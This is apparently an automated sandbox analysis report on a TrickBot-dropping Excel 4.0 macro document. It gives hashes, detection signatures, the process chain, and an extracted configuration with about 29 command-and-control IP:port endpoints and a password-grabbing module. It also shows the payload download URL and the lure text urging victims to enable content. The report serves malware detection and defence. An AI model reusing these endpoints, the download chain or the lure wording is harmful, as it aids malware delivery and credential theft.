Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 446446.xls

Overview

General Information

Sample Name:446446.xls
Analysis ID:385552
MD5:1b62b4f4b16d6219dce4c6d145c5af79
SHA1:d5bc46f3043119c020ae93121195aabbf151cf75
SHA256:dd3ecdcc3a6cc81ee451f90703cc899ff43c7a05b30a6538e5f3afd73f77adb1
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 TrickBot
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Trickbot
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Office process drops PE file
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6276 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6624 cmdline: rundll32 ..\fdinmd.fii,StartW MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • wermgr.exe (PID: 6676 cmdline: C:\Windows\system32\wermgr.exe MD5: FF214585BF10206E21EA8EBA202FACFD)
  • cleanup

Malware Configuration

Threatname: Trickbot

{"ver": "2000028", "gtag": "rob52", "servs": ["89.250.208.42:449", "182.253.184.130:449", "31.211.85.110:443", "85.112.74.178:449", "102.68.17.97:443", "103.76.150.14:443", "96.9.77.142:443", "91.185.236.170:449", "87.76.1.81:449", "91.225.231.120:443", "62.213.14.166:443", "201.114.152.181:60304", "91.248.207.239:13871", "5.50.104.227:23468", "122.117.176.99:50289", "250.16.62.7:12037", "43.219.127.177:42389", "183.210.9.161:55813", "203.2.134.219:34188", "24.203.49.183:64402", "89.227.14.153:60566", "44.55.149.111:41730", "197.181.162.30:5798", "152.49.214.109:59125", "245.241.127.55:36657", "107.85.198.194:37398", "191.250.160.220:23460", "40.81.224.235:45065", "211.246.214.27:8638"], "autorun": ["pwgrab"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
446446.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x165db:$e1: Enable Editing
  • 0x16325:$e3: Enable editing
  • 0x163f7:$e4: Enable content

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.236801064.0000000004070000.00000040.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
    00000001.00000002.236724991.0000000003FB0000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
      00000001.00000002.236774437.0000000004030000.00000040.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.rundll32.exe.4030000.3.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
          1.2.rundll32.exe.3fb0000.2.raw.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
            1.2.rundll32.exe.4030000.3.raw.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security

              Sigma Overview

              No Sigma rule has matched

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 00000001.00000002.236801064.0000000004070000.00000040.00000001.sdmpMalware Configuration Extractor: Trickbot {"ver": "2000028", "gtag": "rob52", "servs": ["89.250.208.42:449", "182.253.184.130:449", "31.211.85.110:443", "85.112.74.178:449", "102.68.17.97:443", "103.76.150.14:443", "96.9.77.142:443", "91.185.236.170:449", "87.76.1.81:449", "91.225.231.120:443", "62.213.14.166:443", "201.114.152.181:60304", "91.248.207.239:13871", "5.50.104.227:23468", "122.117.176.99:50289", "250.16.62.7:12037", "43.219.127.177:42389", "183.210.9.161:55813", "203.2.134.219:34188", "24.203.49.183:64402", "89.227.14.153:60566", "44.55.149.111:41730", "197.181.162.30:5798", "152.49.214.109:59125", "245.241.127.55:36657", "107.85.198.194:37398", "191.250.160.220:23460", "40.81.224.235:45065", "211.246.214.27:8638"], "autorun": ["pwgrab"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

              Software Vulnerabilities:

              barindex
              Document exploit detected (drops PE files)Show sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: SQCTO[1].perclick.0.drJump to dropped file
              Document exploit detected (UrlDownloadToFile)Show sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
              Document exploit detected (process start blacklist hit)Show sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
              Source: global trafficDNS query: name: clientconfig.passport.net
              Source: global trafficTCP traffic: 192.168.2.3:49714 -> 64.207.186.30:80
              Source: global trafficTCP traffic: 192.168.2.3:49714 -> 64.207.186.30:80
              Source: global trafficHTTP traffic detected: GET /blogs/click.php HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: living-traditions.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /blogs/click.php HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: living-traditions.comConnection: Keep-Alive
              Source: unknownDNS traffic detected: queries for: clientconfig.passport.net
              Source: 446446.xls, 90A10000.0.drString found in binary or memory: http://living-traditions.com/blogs/click.php
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://api.aadrm.com/
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://api.cortana.ai
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://api.diagnostics.office.com
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://api.microsoftstream.com/api/
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://api.office.net
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://api.onedrive.com
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://apis.live.net/v5.0/
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://augloop.office.com
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://augloop.office.com/v2
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://cdn.entity.
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://clients.config.office.net/
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://config.edge.skype.com
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://cortana.ai
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://cortana.ai/api
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://cr.office.com
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://dataservice.o365filtering.com
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://dataservice.o365filtering.com/
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://dev.cortana.ai
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://devnull.onenote.com
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://directory.services.
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://graph.ppe.windows.net
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://graph.ppe.windows.net/
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://graph.windows.net
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://graph.windows.net/
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://incidents.diagnostics.office.com
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://lifecycle.office.com
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://login.microsoftonline.com/
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://login.windows.local
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://management.azure.com
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://management.azure.com/
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://messaging.office.com/
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://ncus.contentsync.
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://ncus.pagecontentsync.
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://officeapps.live.com
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://onedrive.live.com
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://onedrive.live.com/embed?
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://outlook.office.com/
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://outlook.office365.com/
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://powerlift.acompli.net
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://settings.outlook.com
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://shell.suite.office.com:1443
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://skyapi.live.net/Activity/
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://staging.cortana.ai
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://store.office.cn/addinstemplate
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://store.office.com/addinstemplate
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://store.office.de/addinstemplate
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://tasks.office.com
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://templatelogging.office.com/client/log
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://web.microsoftstream.com/video/
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://webshell.suite.office.com
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://wus2.contentsync.
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://wus2.pagecontentsync.
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
              Source: 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drString found in binary or memory: https://www.odwebp.svc.ms

              System Summary:

              barindex
              Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
              Source: Screenshot number: 8Screenshot OCR: Enable editing" to unlock the editing document downjoaded from the Internet. Protected View This fi
              Source: Screenshot number: 8Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start c'the decryption of the docume
              Found Excel 4.0 Macro with suspicious formulasShow sources
              Source: 446446.xlsInitial sample: CALL
              Source: 446446.xlsInitial sample: EXEC
              Found obfuscated Excel 4.0 MacroShow sources
              Source: 446446.xlsInitial sample: High usage of CHAR() function: 39
              Source: 446446.xlsInitial sample: High usage of CHAR() function: 26
              Office process drops PE fileShow sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\fdinmd.fiiJump to dropped file
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\SQCTO[1].perclickJump to dropped file
              Source: 446446.xlsOLE indicator, VBA macros: true
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\SQCTO[1].perclick 0AE86E5ABBC09E96F8C1155556CA6598C22AEBD73ACBBA8D59F2CE702D3115F8
              Source: Joe Sandbox ViewDropped File: C:\Users\user\fdinmd.fii 0AE86E5ABBC09E96F8C1155556CA6598C22AEBD73ACBBA8D59F2CE702D3115F8
              Source: 446446.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
              Source: classification engineClassification label: mal96.troj.expl.evad.winXLS@5/8@2/1
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
